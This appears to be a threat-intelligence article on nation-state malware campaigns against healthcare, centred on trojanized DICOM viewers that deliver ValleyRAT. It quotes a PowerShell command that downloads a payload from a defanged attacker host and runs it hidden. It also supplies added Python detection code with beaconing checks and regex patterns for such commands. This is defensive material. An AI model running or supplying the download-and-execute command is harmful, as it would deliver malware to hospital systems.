The healthcare sector faces an unprecedented surge in cyberattacks from nation-state actors seeking to disrupt critical IT infrastructure and operational technology (OT) systems.
Since early 2024, advanced persistent threat (APT) groups linked to Iran, North Korea, and China have exploited vulnerabilities in healthcare networks to deploy destructive malware, ransomware, and backdoors.
These attacks aim to sabotage patient care systems, including diagnostic tools, laboratory automation, and life-support devices, while exfiltrating sensitive biomedical research data.
A May 2025 advisory by ICS-CERT warned of memory corruption flaws in Pixmeo OsiriX MD (CVE-2025-XXXXX), which could allow attackers to crash systems or steal credentials.
Silobreaker analysts recently identified a spike in malware campaigns exploiting Digital Imaging and Communications in Medicine (DICOM) protocols, widely used for medical imaging.
In one campaign, attackers distributed trojanized DICOM viewer software, including spoofed Philips and Siemens applications, to deploy backdoors like ValleyRAT and Floxif.
These tools enable remote access to networked MRI/CT scanners and patient databases. Researchers noted that the malware’s command-and-control (C2) infrastructure overlaps with known Chinese APT clusters, including Silver Fox and Panda Burning Incense.
The financial and human costs are staggering. The 2024 ALPHV ransomware attack on Change Healthcare disrupted 100+ critical applications, delaying prescriptions for 190 million patients.
Similarly, the Qilin ransomware group’s breach of Synnovis forced London hospitals to cancel thousands of surgeries.
Threat actors increasingly pivot from IT to OT systems, exploiting legacy medical devices with hardcoded passwords or unpatched libraries.
Exploiting DICOM Protocols: A Gateway to Medical Device Tampering
A February 2025 Forescout report revealed 29 malicious DICOM viewer samples designed to deploy ValleyRAT.
Attackers used filenames like Philips_DICOM_Viewer_Installer.exe to trick healthcare staff into executing PowerShell scripts that fetch payloads:
powershell Invoke-WebRequest -Uri "hxxps://malware[.]xyz/philips_update" -OutFile "$env:TEMP\~tmp.exe"; Start-Process "$env:TEMP\~tmp.exe" -WindowStyle Hidden
Once installed, ValleyRAT establishes persistence via registry keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) and communicates with C2 servers using AES-encrypted HTTP requests.
Silobreaker’s analysis of network traffic showed beaconing intervals of 300 seconds, mimicking legitimate DICOM data transfers to evade detection.
The malware also abuses DICOM’s image-sharing protocol to alter diagnostic results. For example, researchers demonstrated how attackers could inject fake tumors into CT scans by manipulating pixel data in DICOM files.
While such attacks remain rare, exposed DICOM servers, over 3,000 of which are publicly accessible, provide low-hanging fruit for APTs.
Healthcare institutions are advised to segment IT/OT networks, enforce multi-factor authentication for DICOM systems, and monitor for anomalous PowerShell activity.
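Two of the indicators above, the fixed 300-second beaconing cadence and the download-to-TEMP-then-hidden-launch PowerShell pattern, are simple enough to check for in a SOC script. The following is an added example written for this article; it is not code from Silobreaker, Forescout, or the article itself. The connection-log format, host names, IP addresses, and the jitter and match thresholds are all constructed assumptions chosen for the demonstration.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample outbound-connection log (not taken from the article).
# Format assumed for this example: "<ISO timestamp> <src_ip> -> <dst_host> <bytes>"
# 10.20.1.15 is a modality pushing bursty, variable-size DICOM studies to PACS;
# 10.20.1.42 is a workstation phoning home every ~300 s with near-identical sizes.
SAMPLE_CONN_LOG = """\
2025-05-01T08:00:00 10.20.1.15 -> pacs.hospital.local 524288
2025-05-01T08:00:00 10.20.1.42 -> update-cdn.example 1204
2025-05-01T08:05:00 10.20.1.42 -> update-cdn.example 1198
2025-05-01T08:07:13 10.20.1.15 -> pacs.hospital.local 98304
2025-05-01T08:10:00 10.20.1.42 -> update-cdn.example 1210
2025-05-01T08:15:01 10.20.1.42 -> update-cdn.example 1201
2025-05-01T08:19:40 10.20.1.15 -> pacs.hospital.local 2097152
2025-05-01T08:20:00 10.20.1.42 -> update-cdn.example 1199
"""

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+) (\d+)$")


def parse_connections(text):
    """Parse the constructed log format into (timestamp, src, dst, bytes) tuples."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the whole run
        rows.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), int(m.group(4))))
    return rows


def find_beacons(rows, min_events=4, max_jitter=0.05):
    """Return (src, dst, mean_gap_seconds) for flows whose inter-connection gaps
    are nearly constant. Legitimate DICOM transfers are bursty; a metronome-like
    cadence is the beaconing behaviour the article attributes to ValleyRAT.
    max_jitter is the coefficient of variation (stdev / mean) tolerated."""
    by_flow = defaultdict(list)
    for ts, src, dst, _ in rows:
        by_flow[(src, dst)].append(ts)
    hits = []
    for (src, dst), stamps in by_flow.items():
        if len(stamps) < min_events:
            continue  # too few samples to call a cadence
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        if statistics.pstdev(gaps) / mean <= max_jitter:
            hits.append((src, dst, round(mean)))
    return hits


# Indicator families drawn from the command line quoted in the article:
# a download cmdlet, a drop path under the user's temp directory, and a
# hidden-window process launch. Matching several at once is the signal.
PS_INDICATORS = [
    re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I),
    re.compile(r"\$env:temp|\\appdata\\local\\temp", re.I),
    re.compile(r"-windowstyle\s+hidden|\s-w\s+hidden", re.I),
]


def score_powershell(cmdline):
    """Count how many indicator families a PowerShell command line matches."""
    return sum(1 for rx in PS_INDICATORS if rx.search(cmdline))


def is_suspicious_powershell(cmdline, threshold=2):
    """Flag a command line when it matches at least `threshold` families,
    so a lone Invoke-WebRequest to an intranet share does not page anyone."""
    return score_powershell(cmdline) >= threshold


if __name__ == "__main__":
    for src, dst, gap in find_beacons(parse_connections(SAMPLE_CONN_LOG)):
        print(f"beacon candidate: {src} -> {dst} every ~{gap}s")
    sample = ('powershell Invoke-WebRequest -Uri "hxxps://malware[.]xyz/philips_update" '
              '-OutFile "$env:TEMP\\~tmp.exe"; Start-Process "$env:TEMP\\~tmp.exe" -WindowStyle Hidden')
    print("suspicious" if is_suspicious_powershell(sample) else "benign", "->", score_powershell(sample))
```

The beacon check deliberately ignores destination reputation: the article notes the traffic was shaped to look like DICOM transfers, so the cadence itself is the tell. Feed `find_beacons` with events from a proxy or firewall export in the same tuple shape, and feed `score_powershell` with Sysmon Event ID 1 or PowerShell script-block command lines.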
Silobreaker’s threat intelligence platform highlights ongoing campaigns exploiting CVE-2023-34362 (MOVEit) and Citrix vulnerabilities, underscoring the need for proactive patch management.
As nation-state actors refine their tactics, integrating threat intelligence into incident response plans becomes a lifeline for patient safety.